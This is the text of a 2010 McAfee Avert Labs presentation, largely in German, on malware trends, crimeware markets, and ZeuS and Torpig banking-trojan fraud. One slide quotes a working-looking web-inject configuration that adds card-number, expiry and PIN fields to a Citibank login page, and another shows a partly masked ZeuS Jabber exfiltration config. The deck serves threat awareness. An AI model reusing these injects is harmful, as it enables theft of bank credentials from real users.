The document discusses trends in malware threats observed by McAfee Avert Labs. It notes a massive increase in the number of malware samples analyzed daily, with most being encrypted or packed to avoid detection. Banking trojans like ZeuS that perform man-in-the-middle attacks to steal login credentials are among the most prevalent threats. Criminal organizations have developed toolkits and markets to enable others to easily create and distribute their own malware.

1. Malware - Threats Trends, Bedrohungen, Entwicklungen Toralv Dirro McAfee Avert Labs EMEA Security Strategist February 12, 2010

2. February 12, 2010 Aktueller Wetterbericht

3. Weltweit bei den Avert Labs: Aktuell $zu_grosse_Zahl unterschiedliche Stücke Malware von Avert Labs identifiziert Wir haben aufgehört zu zählen, die alte Methode macht keinen Sinn mehr: 50000+ Samples werden täglich analysiert 95% und mehr sind Statisch (nicht selbstreplizierend) Trojaner und Bots 90% und mehr sind gepackt/verschlüsselt “ Runtime Packer” February 12, 2010

4. Gesamtzahl Samples February 12, 2010 Quelle: AV-Test.org

5. Global Malware Vision Collections: The Great Zoo February 12, 2010 (Cumulative) Q1-2009: +4.2 million samples Q2-2009: +4.1 million samples

6. Selbstreplizierende und Statische Malware February 12, 2010

7. Rootkits werden die Regel, nicht die Ausnahme February 12, 2010

8. Motivation Gestern February 12, 2010

9. Motivation Heute February 12, 2010 Source: Chat Interview mit “Dream Coders Team”, den Entwicklern von MPack http://www.robertlemos.com/2007/07/23/mpack-interview-chat-sessions-posted/

10. Today’s Threat Landscape February 12, 2010 Increase in malware code added from 07 - 08 500% More Malware Variations Malware is obfuscated 80% Toolkits & Obfuscation New malicious website detected 60 Seconds Web 2.0 is the Catalyst! Of all threats are financially motivated 90% Active new zombies per month 5m Attack Target Users vs. Machines

11. Öffentliche Handelsplattformen February 12, 2010

12. Und das traurige Resultat February 12, 2010

13. Der Untergrund Marktplatz February 12, 2010 Bank Logons A Washington Mutual Bank account in the U.S. with an available balance of $14,400 is priced at 600 euros ($924), while a Citibank UK account with an available balance of 10,044 pounds is priced at 850 euros ($1,310). It may appear to be less dangerous to resell access to a bank account rather than to use it directly.

14. Die Tools February 12, 2010

15. The Malware Toolkit Marketplace February 12, 2010 Source: McAfee Avert Labs Crimeware (Author) Description Pricing FirePack (Diel) Web Exploitation Malware Kit Note: a Chinese version exists $3000 (February 2008) $300 (April 2007) Zupacha, ZeuS and ZUnker ($ash) The ZeuStrojan is able to inject code into login webpage of financial organization to ask personal data and divert them to a remote location. Zupacha is a bot element, and Zunker a C&C. $1000 for Zupacha, $2000 for Zunker (January 2008) Adrenaline, an update of Nuclear Grabber (Corpse) Universal kit for creating tools to capture targeted banking data. Able to intercept and retransmit authentic transactions on the fly between the bank and its client. $3000 PolySploit, an update of NeoSploit (Grabarz) Web Exploitation Malware Kit, statistical engine, enhanced configuration capability, exploitation package , enhanced support and online forum for customers. 100 € El fiesta Web Based and PDF-Exploit Pack used to launch attacks and monitor them. $850 (December 2008) Turkojan RAT (AlienSoftware) A Remote Access Tool made in Turkey. Bronze edition: $99 (July 2008) Silver edition: $179 Gold edition: $249 ZoPack Web Based PDF-Exploit Pack used to launch attacks and monitor them..

16. CaaS – Crimeware as a Service February 12, 2010 Source: McAfee Avert Labs Service Description Prices Encountered Proxy Rental Botnet networks on a “Per use” (on a monthly basis) or “daily rates” (on a daily basis, over a month) plans. Daily Limit 50, Qty per Month 1500: $95 Per Use Plan, Qty per Month 1000: $69.95 Web Injection Shop HTML injection codes designed to steal information from customers of dozens of financial institutions worldwide. Each HTML injection is specifically tailored to match each bank’s specific website design. Each between $10 and $30 Spam facilities Spamming tools, mailing lists, etc. 5000/7000 emails per minute, over 1 million emails per day: $2000 per month Botnet management HTTP Command & Control facilities for ZeuSmalware. $50 per month Flooding/DDoS Complete paralysis of your competitor by flooding his stationary or mobile phone his web site $80 per 24h 1 hour: $20 ; 1 day: $100 Large projects: $200

17. Passwörter hacken? Wozu??! February 12, 2010

18. Shark: Compilable multi system back door Trojan February 12, 2010

19. Beispiel einer Konfigurations-Datei <inject url=&quot; citibank.com &quot; before=&quot;name=password></TD></TR>&quot; what=&quot; <TR><TD colspan=3 class=smallArial noWrap></TD></TR> <TR><TD colspan=3 class=smallArial noWrap> <SPAN STYLE='color:red'> To prevent fraud enter your credit card information please :</SPAN></TD></TR> <TR><TD colspan=3 class=smallArial noWrap></TD></TR> <TD noWrap colSpan=2><B> Your ATM or Check Card Number: </B></TD> <TD class=smallArial noWrap align=right></TD></TR> <TD class=username colSpan=3><INPUT id=cc type=text maxlength=16 size=16 value='' name=cc></TD></TR> <TD noWrap colSpan=2><B> Expiration Date: </B></TD> <TD class=smallArial noWrap align=right>(e.g. 07.2007)</TD></TR> <TD class=username colSpan=3><INPUT id=expdate type=text maxlength=7 size=7 value='' name=expdate></TD></TR> <TD noWrap colSpan=2><B> ATM PIN: </B></TD> <TD class=smallArial noWrap align=right></TD></TR> <TR> <TD class=username colSpan=3><INPUT id=pin type=password size=4 maxlength=4 value='' name=pin></TD></TR> &quot;block=&quot;sign-on.&quot; check=&quot;pin&quot; quan=&quot;4&quot; content=&quot;d&quot; > </inject> February 12, 2010

20. √ Ω February 12, 2010 User ist auf seiner Bank Webseite SSL Zertifikat ist valide, Schloss wird angezeigt Torpig injiziert in den Browser ein Form, das nach zusätzlichen Informationen fragt – im selben Stil wie die Webseite

21. Delivery February 12, 2010

22. Email Attachments – nach wie vor häufig February 12, 2010

23. Spear Phishing: “ Whaling ” “ The United States Tax Court has received many telephone calls regarding an e-mail which purports to originate from the Court being sent by a member of the Tax Court’s practitioner bar. This message is an example of “Spear Phishing,” which is an e-mail spoofing attempt that targets a specific organization. The Tax Court is not disseminating any e-mail notice to anyone who currently has a case before this Court.” February 12, 2010

24. February 12, 2010 Web 2.0 Emails werden durch Links in Social Networks ersetzt

25. Koobface vorbei am Contentfilter… Nutzt Vertrauen February 12, 2010

26. Autorun Würmer February 12, 2010 Weitgehend ignoriert – bis Conficker kam

27. Autorun ist heute ein bedeutender Infektionsweg February 12, 2010

28. Anatomie eines Angriffes: Torpig botnet February 12, 2010 Alle 2 Stunden Wird ein Bot Opfer System GET / Web Server mit Sicherheitslücke 1 <iframe> 2 Mebroot drive-by-download Server GET/?gnh5 (request JS code) 3 Launches exploits gnh5.exe downloaded Installs Mebroot, injects DLL 4 Mebroot C&C server 5 TorpigDLLs injected into IE, Firefox, Outlook, Skype, IM, etc. 6 Torpig C&C server Gestohlene Daten alle 20 min hochladen 7 Config file containing bank domains, new C&C servers 300 domains for target FIs 8 Injection server URL 9 Phishing HTML 10

29. ZeuS - “human” MITM – Step 1 Maintenance, bitte warten…

30. ZeuS - “human” MITM – Step 2 Zur Sicherheit etwas Mathe…

31. ZeuS - “human” MITM – Step 3 Sicherheitshalber die Mobiltelefonnummer bitte

32. ZeuS - “human” MITM – Step 4 Bestätigen mit iTAN 10

33. ZeuS - “human” MITM – Step 5 Erfolgreich hinzugefügt (wozu auch immer)

34. ZeuS - “human” MITM – Step 6 Bedauerlicherweise wegen Wartungsarbeiten heute geschlossen

35. ZeuS - “human” MITM Admin Panel

36. ZeuS – mit Instant Messaging ZeuS Jabber Add-on [im] server=jabber.ru username=glom*** password=qazx***** to=thekl***@jabber.ru to1=icq12***@jabber.ru to2=tank56***@jabber.ru ; name=mask ; mask [keylist] ;key1=&quot;login=&quot; key2=&quot;injtoken=&quot; key3=&quot;inja1=&quot; [list] ;test1=*onlineeast*.bankofamerica.com*

37. Malware / Crimeware February 12, 2010 URLZone The Trojan calls back to its command and control server for specific instructions on exactly how much to steal from the victim's bank account without raising any suspicion, and to which money mule account to send it the money. Then it forges the victim's on-screen bank statements so the person and bank don't see the unauthorized transaction. http://vil.nai.com/vil/content/v_237377.htm (Downloader-BQZ.a) http://www.darkreading.com/database_security/security/client/showArticle.jhtml?articleID=220300592 This statement shows a transaction of 53.94 Euros when actually 8,571.31 Euros was removed from the account. The balance has been changed by the Trojan. ( http://www.geek.com/articles/news/malware-now-covers-its-tracks-in-bank-statements-20090930/ )

38. Is Your Computer Infected (by a Fake Anti-Virus) ? February 12, 2010 Q1 Q2 Q3

39. They Are Popular Because They Work and Look Valid February 12, 2010

40. People and Economy behind it February 12, 2010

41. February 12, 2010

42. Good at Crime, clueless about Security Goal: Tracking distribution sites Discovered: Everything „ Product lists“ Tech Support Calls Project Documentation Affiliate Lists Sourcecode Employee lists And much more.... February 12, 2010

43. FOCUS 09 Anatomy of a scareware company February 12, 2010 http://www.internetnews.com/security/article.php/3842936/McAfee+FOCUS+09+Anatomy+of+a+Scareware+Scam.htm Using more than 63 gigabytes of information culled from querying the company's own portal servers and other publicly available data, Dirk Kollberg, from McAfee Labs, unearthed some astonishing operational details including the following: Innovative Marketing used more than 34 different production servers in less than six months and used as many as six different servers at a time to infect, advertise and sell their illicit wares. In one 10-day stretch, the company received more than 4 million download requests, meaning that at least 4 million people tried to buy the worthless applications. Internal documents report that the URLs used to hawk the scareware are only valid for 15 minutes, making it all but impossible for federal, state or international law enforcement agencies to yank the offending URLs before they've moved on to new addresses. It used multiple customer call centers, including at least one in Poland and one in India, to service unsuspecting customers calling via VoIP connections to buy, remove or question the need for the unnecessary scareware. And, believe it or not, they recorded and saved these bogus customer service calls. More incredibly, 95 percent of callers exited were &quot;happy&quot; when the call concluded. Because they needed an extensive network of ISPs to pull off the scam, Innovative Marketing kept detailed spreadsheets with all the ISPs pertinent data including price, location and, most telling, a column that rate the ISPs &quot;abuseability&quot;—essentially an assessment of which ISPs would play ball and not ask questions as they went about their business. The company added a whopping 4.5 million order IDs, essentially new purchases, in 11 months last year. With most of the phony applications selling for $39.95, that's more than $180 million in less than a year.

44. Fragen? Mehr Info? Read the Avert Labs Security Blog http://www.avertlabs.com/research/blog Listen to the AudioParasitics Podcast http://www.audioparasitics.com Read the Monthly Spam Report http://www.mcafee.com Read the McAfee Quarterly Threat Report http://www.mcafee.com Read the McAfee Security Journal http://www.mcafee.com Watch the Stop H*Commerce Series http://www.stophcommerce.com February 12, 2010